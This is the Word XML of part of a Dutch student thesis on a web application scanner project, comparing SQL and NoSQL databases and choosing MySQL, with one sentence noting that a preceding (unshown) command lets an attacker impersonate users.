                  <w:txbxContent>
                    <w:p w14:paraId="3F168C55" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00CF3AE8">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1A92AC97" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRPr="00F12D3B" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48E1993F" w14:textId="7FE04C7A" w:rsidR="00DE405E" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:t xml:space="preserve">Bij het uitvoeren van deze commando kan de hacker zich nu </w:t>
      </w:r>
      <w:r w:rsidRPr="008E50BA">
        <w:t>proble</w:t>
      </w:r>
      <w:r>
        <w:t>emloos voordoen als andere gebruikers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE2E69F" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRDefault="00DE405E">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E59BFEE" w14:textId="1B94CDE5" w:rsidR="00E31BB5" w:rsidRDefault="00E31BB5" w:rsidP="000E3238">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00F9607E">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="44"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253282304" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="096E84E4" wp14:editId="366EBBD0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-894315</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-899160</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="854" name="Rectangle 8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5C8" id="Rectangle 854" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.4pt;margin-top:-70.75pt;width:25pt;height:1031.7pt;z-index:-2500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U2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5Mp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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00DF72C7" w:rsidRPr="00F9607E">
        <w:t>SQL onderzoek</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433637B9" w14:textId="37F9148E" w:rsidR="00DE405E" w:rsidRPr="00A71F83" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:r w:rsidRPr="001A1584">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Voordelen van een SQL database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12049E3C" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:r>
        <w:t>SQL is een ANSI</w:t>
      </w:r>
      <w:r w:rsidRPr="004940EC">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>/ISO</w:t>
      </w:r>
      <w:r w:rsidRPr="004940EC">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> standaardtaal voor relationele DBM systemen. Omdat het gestandaardiseerd is kan het bijna met elke software systeem geïntegreerd worden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56371819" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:r>
        <w:t xml:space="preserve">Een sterke punt van SQL databases is het gebruik van SQL als operatieve taal. Met deze taal kun je query’s uitvoeren waarmee data opgehaald kan worden, gewijzigd, geüpdatet en verwijderd. Het is een declaratieve taal wat het schrijven van query’s makkelijk maakt. Bij declaratieve talen schrijft je wat er moet gebeuren i.p.v. hoe het moet gebeuren. Dit maakt het een krachtige taal met een lage leercurve. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA448AE" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:r>
        <w:t>Een ander sterk punt van SQL databases is dat zij gebruik maken van gestructureerde schema waarmee op een georganiseerde manier data kan worden opgeslagen. Bij het maken van een schema wordt er eerst wat voorbereidend werkt gedaan, zoals het identificeren van entiteiten en het normaliseren daarvan, dit wordt gedaan om redundantie binnen het database structuur te verminderen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B850DA2" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:r>
        <w:t xml:space="preserve">Een schema bestaat zoals in figuur 3.5.2 uit tabellen, deze zijn met elkaar verbonden door relaties wat een ander voordeel is. Database engineers kunnen relaties tussen tabellen definiëren om zo afhankelijkheid tussen de tabellen te creëren. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A68D233" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRPr="001311F0" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001311F0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Relaties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1254B9E9" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Één op één relatie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576CC8C7" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Één op veel relatie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035F6FC9" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Veel op veel relatie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F501E4C" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:r>
        <w:t xml:space="preserve">Zoals in figuur 3.5.2 is aangegeven is tabel Comment afhankelijk van tabel Blog met een één op veel relatie. Een ander krachtige functie van SQL is het gebruik van JOINS. JOINS worden gebruikt bij het selecteren van data uit meerdere tabellen. SQL databases maken gebruik van Constraints (beperkingen) binnen het systeem. Contraints zijn regels waar een tabel zich aan moet houden zo kan het de invoer van specifieke data types limiteren of ervoor zorgen dat velden niet leeg mogen zijn. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA75739" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRPr="00923179" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00923179">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Aantal </w:t>
      </w:r>
      <w:r w:rsidRPr="00923179">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Contrains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CA0B3D" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRPr="00923179" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00923179">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>NOT  NULL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1DDB5C" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRPr="00923179" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00923179">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>UNIQUE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077514BE" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRPr="00815674" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00923179">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">CHECK </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A978F8" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRPr="00714FFE" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Samengevat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D92818F" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:r>
        <w:t xml:space="preserve">SQL databases bieden de middelen aan, om gestructureerde databases te ontwerpen en bouwen en waar, op een georganiseerde manier data in kan worden opgeslagen. SQL databases gebruik je wanneer het een eis is van het systeem dat data op een gestructureerde en georganiseerde manier moet worden opgeslagen en wanneer het systeem de invoer van data limiteert met Constrains (beperkingen). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08811F06" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8FD503" w14:textId="49497891" w:rsidR="00DE405E" w:rsidRPr="00CC4DB8" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00537717">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253280256" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6C2015CE" wp14:editId="79E28309">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-897185</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-899369</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="852" name="Rectangle 8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BCDEC" id="Rectangle 852" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.65pt;margin-top:-70.75pt;width:25pt;height:1031.7pt;z-index:-2500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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00CC4DB8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Voordelen van een NO-SQL database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EBB7E6" w14:textId="08F20F81" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:r>
        <w:t xml:space="preserve">Wanneer er een grote hoeveelheid data aanwezig is en het is niet mogelijk om een ervoor gedefinieerde structuur te ontwerpen dan is het niet verstandig om het in een relationele database op te slaan. NOSQL biedt hier een oplossing voor, het is geschikt voor web applicaties met grootschalige databases die geen gebruik maken van relationele schema en die zeer schaalbaar moeten zijn. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FAA3EF" w14:textId="1B1F8917" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:r>
        <w:t xml:space="preserve">NOSQL databases zijn makkelijker te beheren vanwege hun simpele data model structuur, dit verlaagd de administratie en configuratie eisen van een DBMS en dat verlaagd weer de onderhoud kosten. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776FD632" w14:textId="6D8EDF0A" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:r>
        <w:t xml:space="preserve">NOSQL databases hebben veel minder restricties dan rationele databases. Door de key-value structuur dat in documenten worden opgeslagen in de database, zorgt ervoor dat web applicaties virtueel met elke data structuur kunnen werken. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18793C38" w14:textId="39D2B298" w:rsidR="00DE405E" w:rsidRPr="00CC4DB8" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Samengevat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E07F427" w14:textId="7A9A3113" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:r>
        <w:t xml:space="preserve">Als een systeem schaalbaar moet zijn, een groot hoeveelheid data moet verwerken waarvan de structuur niet vooraf gedefinieerd kan worden en het onderhouden van een RDBMS financieel niet mogelijk is dan biedt NOSQL database een geschikte oplossing voor het probleem.    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122E64C5" w14:textId="5A121604" w:rsidR="00DE405E" w:rsidRPr="00461740" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00461740">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Conclusie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DCA2ED" w14:textId="09B9F36F" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:r>
        <w:t xml:space="preserve">Met betrekking tot het projectcontext kan ik stellen dat NOSQL niet geschikt is voor het software systeem die ik ga ontwikkelen voor mijn afstudeerproject. De systeemeisen van de Webapplicatie scanner met betrekking tot de database komen niet overeen met wat een NOSQL kenmerkt, op een aantal zaken na. De database heeft een vooraf gedefinieerde data structuur, het maakt gebruik van integriteitsregels en entiteit relaties. De zaken die wel overeenkomen zijn: grote hoeveelheid data dat verwerkt moet worden en, vanwege de modulariteit van het systeem is de schaalbaarheid van een NOSQL database ook een belangrijk kenmerk.    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63630AE7" w14:textId="15688EAA" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00394FB6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DBMS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A63195" w14:textId="03BF9984" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:r>
        <w:t>In de voorgaande deel heb ik mijn keuze laten vallen op de relationele DBMS. Wat er nu overblijft voor dit deelonderzoek is het vinden van een geschikte DBMS. Ik zal enkel kijken naar open source database systemen dus die van Microsoft en IBM vallen al af. Dit zijn tevens ook de twee grootste leveranciers van DBMS op Oracle na die naast een commerciële versie, ook een open source versie aanbiedt (MySQL). Ik heb in het verleden alleen met één RDBMS gewerkt, en dat is MySQL. Deze heeft twee versies de web versie phpMyAdmin en voor Desktop MySQL Workbench. Deze is het meest gangbare en meest populaire als het gaat om open source database applicaties. MySQL is voor grootschalige database servers ideaal en heeft veel features en een goed support community. Het heeft een lage leercurve en is relatief makkelijk te implementeren in een ontwikkelomgeving zoals Laravel. Er zijn een aantal andere databasemanagementsystemen die open source zijn maar, in dit geval hoef ik niet verder te zoeken omdat dit al een geschikte optie is voor mijn Webapplicatie scanner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C91006" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRPr="001A1A4B" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006176AD">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Database afhankelijkheid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EA3AD8" w14:textId="0D6217A9" w:rsidR="00B95B79" w:rsidRPr="00F241F6" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">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sectPr w:rsidR="00B95B79" w:rsidRPr="00F241F6" w:rsidSect="008D40E9">
      <w:headerReference w:type="default" r:id="rId156"/>
      <w:headerReference w:type="first" r:id="rId157"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1417" w:right="1417" w:bottom="285"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11649" w14:textId="77777777" w:rsidR="00F22B90" w:rsidRDefault="00F22B90" w:rsidP="004B0A6F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3804B3FB" w14:textId="77777777" w:rsidR="00F22B90" w:rsidRDefault="00F22B90"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E2204E" w:rsidRDefault="00E2204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022">
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
        <w:noProof/>
      </w:rPr>
      <w:t>86</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="56E18E34" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00E131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CEC3" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="002E7D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022">
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
        <w:noProof/>
      </w:rPr>
      <w:t>81</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="4CE39DC5" w14:textId="74781E58" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="000F58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E99A" w14:textId="77777777" w:rsidR="00F22B90" w:rsidRDefault="00F22B90" w:rsidP="004B0A6F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="111B84A3" w14:textId="77777777" w:rsidR="00F22B90" w:rsidRDefault="00F22B90"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6AB7" w14:textId="0966B72A" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251745280" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="448D8114" wp14:editId="0BC52764">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>5956935</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-442595</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="622300" cy="646430"/>
          <wp:effectExtent l="0" t="0" r="12700" b="0"/>
          <wp:wrapSquare wrapText="bothSides"/>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E2204E" w:rsidRDefault="00E2204E">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E2204E" w:rsidRDefault="00E2204E">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E2204E" w:rsidRDefault="00E2204E">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E2204E" w:rsidRDefault="00E2204E"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E2204E" w:rsidRDefault="00E2204E">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E2204E" w:rsidRDefault="00E2204E">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E2204E" w:rsidRDefault="00E2204E">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E2204E" w:rsidRDefault="00E2204E"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740478BA">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>6085840</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-334645</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="502285" cy="415290"/>
          <wp:effectExtent l="0" t="0" r="5715" b="0"/>
          <wp:wrapSquare wrapText="bothSides"/>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E2204E" w:rsidRDefault="00E2204E">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E2204E" w:rsidRDefault="00E2204E"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5948" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251743232" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0A00F541" wp14:editId="61CD66C6">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>5958840</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-335280</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="622300" cy="646430"/>
          <wp:effectExtent l="0" t="0" r="12700" b="0"/>
          <wp:wrapSquare wrapText="bothSides"/>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E2204E" w:rsidRDefault="00E2204E">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E2204E" w:rsidRDefault="00E2204E"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E2204E" w:rsidRDefault="00E2204E">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E2204E" w:rsidRDefault="00E2204E"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E2204E" w:rsidRDefault="00E2204E">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7340" w14:textId="65C79DCA" w:rsidR="00D41025" w:rsidRDefault="007B6022"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64736" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="35FD2EF7" wp14:editId="7B1F6EE9">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>5817234</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>-224112</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="568081" cy="577172"/>
              <wp:effectExtent l="0" t="0" r="16510" b="33020"/>
              <wp:wrapNone/>
              <wp:docPr id="25" name="Can 25"/>
              <wp:cNvGraphicFramePr/>
              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                  <wps:wsp>
                    <wps:cNvSpPr/>
                    <wps:spPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="568081" cy="577172"/>
                      </a:xfrm>
                      <a:prstGeom prst="can">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A7D02"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5" o:spid="_x0000_s1026" type="#_x0000_t22" style="position:absolute;margin-left:458.05pt;margin-top:-17.6pt;width:44.75pt;height:4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" adj="5315" fillcolor="#e7e6e6 [3214]" strokecolor="#747070 [1614]" strokeweight="1pt">
              <v:stroke joinstyle="miter"/>
            </v:shape>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
    <w:r w:rsidR="00D41025">
      <w:tab/>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49E0D942" w:rsidR="00E2204E" w:rsidRDefault="007B6022">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251762688" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="455AA3B2" wp14:editId="36AF28F2">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>6048375</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-8763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63712" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="51511600" wp14:editId="011FA951">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>-532765</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-44894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2">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44E6" w14:textId="743DCBFF" w:rsidR="00D41025" w:rsidRDefault="00B47069" w:rsidP="000D698A">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="4536"/>
        <w:tab w:val="clear" w:pos="9072"/>
        <w:tab w:val="left" w:pos="8236"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251760640" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="01C7E4FC" wp14:editId="060C9DDA">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>-532765</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-448945</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="723900" cy="682625"/>
          <wp:effectExtent l="0" t="0" r="12700" b="3175"/>
          <wp:wrapSquare wrapText="bothSides"/>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8592" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="35A8CEA2" wp14:editId="5856B182">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>5944235</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-334645</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="546100" cy="538480"/>
          <wp:effectExtent l="0" t="0" r="12700" b="0"/>
          <wp:wrapSquare wrapText="bothSides"/>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D41025">
      <w:tab/>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1F83" w14:textId="77777777" w:rsidR="00D41025" w:rsidRDefault="00D41025">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6378" w14:textId="165E8E66" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="000D698A">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="4536"/>
        <w:tab w:val="clear" w:pos="9072"/>
        <w:tab w:val="left" w:pos="8236"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251729920" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4489A93C" wp14:editId="10C10333">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>-405765</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-221615</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="577215" cy="577215"/>
          <wp:effectExtent l="0" t="0" r="6985" b="6985"/>
          <wp:wrapSquare wrapText="bothSides"/>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7634260A" wp14:editId="59F93984">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>6007735</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-332105</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="546100" cy="538480"/>
          <wp:effectExtent l="0" t="0" r="12700" b="0"/>
          <wp:wrapSquare wrapText="bothSides"/>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016C" w14:textId="15FA5DF8" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">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9430" w14:textId="2C727972" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
